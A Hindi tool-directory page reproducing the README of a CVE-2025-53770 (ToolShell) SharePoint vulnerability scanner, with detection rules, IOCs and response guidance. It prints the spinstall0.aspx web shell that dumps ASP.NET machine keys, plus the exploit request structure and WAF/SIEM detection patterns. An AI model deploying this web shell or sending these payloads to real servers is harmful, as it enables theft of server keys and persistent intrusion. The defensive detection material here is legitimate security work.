Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-53770-Scanner — ToolShell scanner - CVE-2025-53770 और पहचान की जानकारी | Kitploit
उपकरण/GitHubGitHub/zephrfish/cve-2025-53770-scanner
रक्षात्मक उपकरणसमझौता संकेतक (IOC) प्रबंधनभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगखतरा खुफियाघटना प्रतिक्रियालॉग विश्लेषण
GitHubzephrfish/cve-2025-53770-scanner

CVE-2025-53770-Scanner

ToolShell scanner - CVE-2025-53770 और पहचान की जानकारी

18551 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
साझा करें

CVE-2025-53770 SharePoint भेद्यता स्कैनर

100% उन सभी ट्वीट्स को एक साथ जोड़कर बनाया गया है जो पेलोड और विभिन्न हमलों के साथ इधर-उधर घूम रहे हैं, इसलिए यह शून्य वारंटी आदि के साथ आता है। स्कैनर कमजोर इंस्टेंस की पहचान करने के लिए डिज़ाइन किया गया है और इसमें शोषण के ज्ञात वास्तविक-दुनिया उपयोगों के साथ एक कॉन्फ़िग है, यह मुख्य रूप से रक्षात्मक उपयोग के लिए डिज़ाइन किया गया है ताकि कमजोर इंस्टेंस की पहचान की जा सके और आप चीजों को पैच कर सकें।

यह स्कैनर SharePoint परिनियोजन की स्वचालित जाँच निम्न प्रकार से करता है:

  • SharePoint ToolPane एंडपॉइंट्स पर exploit पेलोड के साथ तैयार किए गए POST अनुरोध भेजकर
  • मशीन कुंजी निष्कर्षण प्रयासों और सफल शोषण का पता लगाकर
  • द्वितीयक पेलोड परिनियोजन (spinstall0.aspx) की पहचान करके
  • देखे गए हमले पैटर्न के आधार पर भेद्यता संकेतकों के लिए प्रतिक्रियाओं का विश्लेषण करके
  • आत्मविश्वास स्तरों और तत्काल कार्रवाई अलर्ट के साथ विस्तृत रिपोर्टिंग प्रदान करके
  • दक्षता के लिए समवर्ती स्कैनिंग का समर्थन करके

प्रमुख पहचान क्षमताएँ

CRITICAL: मशीन कुंजी निष्कर्षण का पता लगाना

  • सफल मशीन कुंजी निष्कर्षण प्रतिक्रियाओं का पता लगाता है
  • ValidationKey, DecryptionKey और CompatibilityMode एक्सपोज़र की पहचान करता है
  • पाइप-सीमांकित मशीन कुंजी पैटर्न को पहचानता है (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
  • समझौता किए गए सिस्टम के लिए तत्काल कार्रवाई अलर्ट ट्रिगर करता है

द्वितीयक पेलोड पहचान

  • spinstall0.aspx परिनियोजन प्रयासों की पहचान करता है
  • C# ASP.NET पेलोड कोड पैटर्न का पता लगाता है
  • System.Web.Configuration.MachineKeySection उपयोग को पहचानता है
  • संस्करण-विशिष्ट पथ पहचान (SP2013: WEBSER~1\15\ बनाम SP2016+: WEBSER~1\16\)

इंस्टॉलेशन

  1. रिपॉजिटरी क्लोन करें:
root@kitploit:~
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
  1. निर्भरताएँ इंस्टॉल करें:
root@kitploit:~
pip install -r requirements.txt

उपयोग

मूल उपयोग

लक्ष्य होस्ट के साथ एक टेक्स्ट फ़ाइल बनाएं (प्रति पंक्ति एक):

root@kitploit:~
sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local

स्कैनर चलाएं:

root@kitploit:~
python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v

कमांड लाइन विकल्प

आउटपुट प्रारूप

JSON आउटपुट (-o results.json)

root@kitploit:~
[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]

CSV आउटपुट (-o results.csv)

स्प्रेडशीट विश्लेषण के लिए उपयुक्त सारणीबद्ध डेटा प्रदान करता है, जिसमें सभी स्कैन मेट्रिक्स के लिए कॉलम होते हैं।

टेक्स्ट आउटपुट (-o results.txt)

मानव-पठनीय प्रारूप जिसमें भेद्यता स्थिति और स्कैन विवरण होते हैं।

भेद्यता विवरण

CVE-2025-53770 SharePoint के ExcelDataSet घटक में एक deserialization भेद्यता को लक्षित करता है जिसका वास्तविक दुनिया में सक्रिय रूप से शोषण किया गया है। स्कैनर निम्न का पता लगाता है:

पहचाने गए हमले के पैटर्न

  1. प्रारंभिक शोषण: सीरियलाइज़्ड पेलोड के साथ /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx पर POST अनुरोध
  2. मशीन कुंजी निष्कर्षण: सफल शोषण पाइप-सीमांकित मशीन कॉन्फ़िगरेशन लौटाता है:
    root@kitploit:~
    ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
    Example: [128-256 hex chars]|HMACSHA256|[48-96 hex chars]|AES|Framework45
    
  3. द्वितीयक पेलोड: स्थायी पहुंच और कुंजी निष्कर्षण के लिए spinstall0.aspx की परिनियोजना
  4. संस्करण लक्ष्यीकरण: SharePoint संस्करणों के लिए अलग-अलग पथ (15/ बनाम 16/ लेआउट)

सक्रिय शोषण से पुष्टि किए गए IOC

  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Referer: /_layouts/SignOut.aspx
  • Content-Length: आमतौर पर 7699-8000+ बाइट्स
  • पेलोड आकार: बड़े base64-एन्कोडेड CompressedDataTable पैरामीटर
  • प्रतिक्रिया संकेतक: मशीन कुंजी स्ट्रिंग्स, spinstall0.aspx परिनियोजन
  • हमला बुनियादी ढांचा: 65.38.121.198, 162.243.204.189, 165.22.18.129

पहचान तर्क

स्कैनर प्रतिक्रियाओं का विश्लेषण निम्न के लिए करता है:

  1. मशीन कुंजी निष्कर्षण पैटर्न (CRITICAL आत्मविश्वास)
  2. द्वितीयक पेलोड संकेतक (HIGH आत्मविश्वास)
  3. ExcelDataSet/Scorecard घटक प्रोसेसिंग (MEDIUM आत्मविश्वास)
  4. ToolPane त्रुटि पैटर्न और असामान्य प्रतिक्रिया विशेषताएँ (LOW आत्मविश्वास)

सुरक्षा संबंधी विचार

  • यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए डिज़ाइन किया गया है
  • किसी भी सिस्टम को स्कैन करने से पहले उचित प्राधिकरण सुनिश्चित करें
  • स्कैनर डिफ़ॉल्ट रूप से HTTPS उपयोग करता है लेकिन स्व-हस्ताक्षरित प्रमाणपत्र स्वीकार करता है
  • लॉग में संवेदनशील जानकारी हो सकती है - उचित रूप से सुरक्षित करें
  • उच्च थ्रेड गणना का उपयोग करते समय नेटवर्क प्रभाव पर विचार करें

उदाहरण स्कैन सत्र

root@kitploit:~
$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Starting scan of 150 hosts with 10 threads...
Target CVE: CVE-2025-53770 (SharePoint ExcelDataSet deserialization)
Logging to: scan.log
Results will be saved to: vuln-results.json

[+] VULNERABLE [CRITICAL]: sp-prod-01.acme.local
[-] Not vulnerable: sp-dev-02.acme.local  
[!] ERROR: offline-sp.acme.local - Connection timeout
[+] VULNERABLE [HIGH]: sp-legacy.acme.local
Progress: 50/150 (33.3%)
Progress: 100/150 (66.7%)
Progress: 150/150 (100.0%)

============================================================
SCAN COMPLETE
============================================================
Total hosts scanned: 150
Vulnerable hosts: 3
Success rate: 97.3%

VULNERABLE HOSTS (CVE-2025-53770):

  CRITICAL - MACHINE KEY EXTRACTED (1 hosts):
    • sp-prod-01.acme.local (Response time: 0.85s, Version: 2016+)
      WARNING: IMMEDIATE ACTION REQUIRED: Machine keys compromised

  HIGH CONFIDENCE (1 hosts):
    • sp-legacy.acme.local (Response time: 1.23s, Version: 2013-2016)

  LOW CONFIDENCE (1 hosts):
    • sp-archive.acme.local (Response time: 2.10s, Version: Unknown)

Detailed results saved to: vuln-results.json

समस्या निवारण

सामान्य समस्याएँ

  1. कनेक्शन टाइमआउट: टाइमआउट बढ़ाएं या थ्रेड गणना कम करें
  2. SSL त्रुटियाँ: स्कैनर डिफ़ॉल्ट रूप से SSL चेतावनियों को अक्षम करता है
  3. अनुमति त्रुटियाँ: आउटपुट/लॉग फ़ाइलों के लिए लेखन पहुंच सुनिश्चित करें
  4. मेमोरी उपयोग: बड़ी होस्ट सूचियों के साथ निगरानी करें

लॉग विश्लेषण

विस्तृत समस्या निवारण के लिए verbose लॉगिंग (-v) और लॉग फ़ाइलें (-l) सक्षम करें:

root@kitploit:~
tail -f scan.log

शोषण विश्लेषण

देखे गए हमले के पेलोड

स्कैनर सक्रिय हमलों में देखे गए पुष्टि किए गए शोषण पैटर्न के लिए पहचान शामिल करता है:

प्राथमिक पेलोड संरचना

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[ExcelDataSet payload with CompressedDataTable containing serialized exploit]

द्वितीयक पेलोड (spinstall0.aspx)

root@kitploit:~
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

अपेक्षित मशीन कुंजी प्रतिक्रिया प्रारूप

root@kitploit:~
ValidationKey: [128-256 character hex string]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [48-96 character hex string] 
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40

पहचान और निगरानी मार्गदर्शन

संगठनों को संभावित शोषण प्रयासों की पहचान करने के लिए निम्नलिखित पहचान तंत्र लागू करने चाहिए:

1. वेब एप्लिकेशन फ़ायरवॉल (WAF) नियम

SharePoint ToolPane एंडपॉइंट्स पर संदिग्ध POST अनुरोधों की निगरानी करें:

root@kitploit:~
# Example WAF detection rule patterns
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
Query string: "DisplayMode=Edit&a=/ToolPane.aspx"
Request body containing: "MSOTlPn_Uri", "MSOTlPn_DWP"
Request body containing: "ExcelDataSet", "CompressedDataTable"
Request body containing: "Scorecard:ExcelDataSet"
Request body containing: "H4sIAAAAAAAEA" (gzip magic bytes in base64)
Content-Length > 5000 bytes (typical payload size)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx

देखे गए शोषण पैटर्न:

  • पेलोड आकार आमतौर पर 7000-8000+ बाइट्स
  • CompressedDataTable पैरामीटर में URL-एन्कोडेड संपीड़ित डेटा
  • विशिष्ट User-Agent स्ट्रिंग: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
  • Content-Type: application/x-www-form-urlencoded
  • Connection: close हेडर अक्सर मौजूद होता है
  • पेलोड में base64-एन्कोडेड सीरियलाइज़्ड .NET ऑब्जेक्ट
  • प्रतिक्रिया में पाइप-सीमांकित प्रारूप में मशीन कुंजियाँ होती हैं
  • परिनियोजित spinstall0.aspx फ़ाइलों के लिए द्वितीयक अनुरोध

2. SharePoint ULS लॉग

SharePoint यूनिफाइड लॉगिंग सेवा (ULS) लॉग की निगरानी करें:

root@kitploit:~
Category: SharePoint Foundation Web Controls
Level: Unexpected, Error, Critical
Keywords: "ToolPane", "ExcelDataSet", "Deserialization"
Process: w3wp.exe

ULS लॉग में मुख्य संकेतक:

  • ToolPane.aspx प्रोसेसिंग में अप्रत्याशित अपवाद
  • Microsoft.PerformancePoint घटकों में deserialization त्रुटियाँ
  • w3wp.exe में मेमोरी भ्रष्टाचार या प्रक्रिया क्रैश

3. IIS एक्सेस लॉग

शोषण पैटर्न के लिए IIS लॉग की निगरानी करें:

root@kitploit:~
# Log analysis queries (replace with your SIEM syntax)
cs-method="POST" AND cs-uri-stem="/_layouts/15/ToolPane.aspx"
cs-method="POST" AND cs-uri-query="DisplayMode=Edit&a=/ToolPane.aspx"
cs-bytes > 7000 (typical exploit payload size)
cs(User-Agent)="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
cs(Referer)="/_layouts/SignOut.aspx"
sc-status=200 AND time-taken > 5000 (slow processing indicating deserialization)

वास्तविक हमलों से विशिष्ट IOC:

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
Content-Length: 7699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer: /_layouts/SignOut.aspx
Body contains: MSOTlPn_Uri=http%3A%2F%2F[domain]%2F_controltemplates%2F15%2FAclEditor.ascx
Body contains: CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQ

4. नेटवर्क ट्रैफ़िक विश्लेषण

निम्न के लिए नेटवर्क ट्रैफ़िक की निगरानी करें:

  • SharePoint सर्वरों पर असामान्य POST अनुरोध आकार
  • एकल स्रोतों से ToolPane.aspx पर बार-बार अनुरोध
  • HTTP POST बॉडी में base64-एन्कोडेड पेलोड
  • SharePoint को लक्षित करने वाली गैर-ब्राउज़र User-Agent स्ट्रिंग्स

5. Windows इवेंट लॉग

SharePoint सर्वरों पर Windows इवेंट लॉग की निगरानी करें:

root@kitploit:~
Event Log: Application
Source: ASP.NET, SharePoint Foundation
Event IDs: 1309, 1310 (application errors)
Event Log: System
Source: Application Error
Process: w3wp.exe crashes

6. SIEM पहचान नियम

Splunk पहचान क्वेरी:
root@kitploit:~
index=iis source="*iis*" 
| search cs_method="POST" cs_uri_stem="/_layouts/15/ToolPane.aspx" cs_uri_query="DisplayMode=Edit&a=/ToolPane.aspx"
| eval payload_size=tonumber(cs_bytes)
| where payload_size > 7000
| search cs_User_Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
| stats count by src_ip, cs_uri_stem, payload_size
| sort -payload_size
वास्तविक हमलों के लिए उन्नत पहचान:
root@kitploit:~
index=iis 
| search cs_method="POST" AND cs_uri_stem="/_layouts/15/ToolPane.aspx"
| where cs_bytes > 7000 AND cs_bytes < 10000
| search cs_Referer="/_layouts/SignOut.aspx"
| eval attack_pattern=if(like(cs_User_Agent, "%Windows NT 10.0; Win64; x64; rv:120.0%"), "CVE-2025-53770", "Other")
| where attack_pattern="CVE-2025-53770"
| table _time, src_ip, cs_uri_query, cs_bytes, sc_status
Elastic/Kibana क्वेरी:
root@kitploit:~
{
  "query": {
    "bool": {
      "must": [
        {"term": {"http.request.method": "POST"}},
        {"term": {"url.path": "/_layouts/15/ToolPane.aspx"}},
        {"term": {"url.query": "DisplayMode=Edit&a=/ToolPane.aspx"}},
        {"range": {"http.request.bytes": {"gte": 7000, "lte": 10000}}},
        {"term": {"user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}},
        {"term": {"http.request.referrer": "/_layouts/SignOut.aspx"}}
      ]
    }
  }
}
CVE-2025-53770 के लिए Sigma नियम:
root@kitploit:~
title: CVE-2025-53770 SharePoint ExcelDataSet Exploitation
id: cve-2025-53770-sharepoint-exploit
description: Detects exploitation attempts of CVE-2025-53770 SharePoint deserialization vulnerability
references:
    - https://github.com/your-repo/CVE-2025-53770-Scanner
author: Security Team
date: 2025/07/21
logsource:
    category: webserver
    product: iis
detection:
    selection:
        cs-method: 'POST'
        cs-uri-stem: '/_layouts/15/ToolPane.aspx'
        cs-uri-query: 'DisplayMode=Edit&a=/ToolPane.aspx'
        cs-bytes: 
            - gte: 7000
            - lte: 10000
        cs-User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
        cs-Referer: '/_layouts/SignOut.aspx'
    condition: selection
falsepositives:
    - Legitimate SharePoint administrative activities
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2025.53770

7. व्यवहारिक संकेतक

इन पोस्ट-शोषण व्यवहारों पर ध्यान दें:

  • SharePoint सर्वरों से असामान्य आउटबाउंड नेटवर्क कनेक्शन
  • SharePoint या Active Directory में बनाए गए नए उपयोगकर्ता खाते
  • अनधिकृत फ़ाइल अपलोड या संशोधन
  • विशेषाधिकार वृद्धि के प्रयास
  • अन्य सिस्टमों में पार्श्विक गतिविधि (lateral movement)

अनुशंसित प्रतिक्रिया क्रियाएँ

  1. तत्काल प्रतिक्रिया:

    • फ़ायरवॉल/WAF पर संदिग्ध स्रोत IP को ब्लॉक करें
    • यदि शोषण की पुष्टि हो तो प्रभावित SharePoint सर्वरों को अलग करें
    • फोरेंसिक विश्लेषण के लिए लॉग और मेमोरी डंप सुरक्षित रखें
  2. जांच:

    • दुर्भावनापूर्ण सामग्री के लिए POST अनुरोध पेलोड का विश्लेषण करें
    • सफल कोड निष्पादन के संकेतकों की जाँच करें
    • उपयोगकर्ता खाता गतिविधियों और अनुमति परिवर्तनों की समीक्षा करें
    • अन्य सुरक्षा घटनाओं के साथ सहसंबंध करें
  3. नियंत्रण:

    • सुरक्षा पैच तुरंत लागू करें
    • शोषण प्रयासों को ब्लॉक करने के लिए WAF नियम लागू करें
    • SharePoint सर्वरों को महत्वपूर्ण नेटवर्क संसाधनों से अलग करें

SIEM एकीकरण उदाहरण

स्कैन परिणाम Splunk में आयात करना:

root@kitploit:~
# Convert scan results for Splunk ingestion
python3 scanner.py -i hosts.txt -o results.json
# Import into Splunk index
curl -k -H "Authorization: Splunk <token>" -X POST \
  "https://splunk-server:8088/services/collector" \
  -d @results.json
टूल डाउनलोड करें
विकल्पविवरणडिफ़ॉल्ट
-i, --inputहोस्ट सूची फ़ाइल का पथ (आवश्यक)-
-o, --outputपरिणामों के लिए आउटपुट फ़ाइल (.json, .csv, .txt)None
-l, --logfileविस्तृत लॉगिंग के लिए लॉग फ़ाइल पथNone
-t, --threadsसमवर्ती थ्रेड्स की संख्या10
-v, --verboseविस्तृत आउटपुट और लॉगिंग सक्षम करेंFalse